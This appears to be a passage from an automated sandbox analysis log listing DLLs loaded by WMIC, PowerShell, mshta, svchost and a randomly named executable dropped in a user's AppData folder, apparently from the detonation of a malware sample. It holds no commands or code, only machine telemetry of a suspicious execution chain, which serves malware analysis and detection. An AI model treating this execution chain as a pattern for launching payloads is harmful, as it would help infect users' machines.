Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
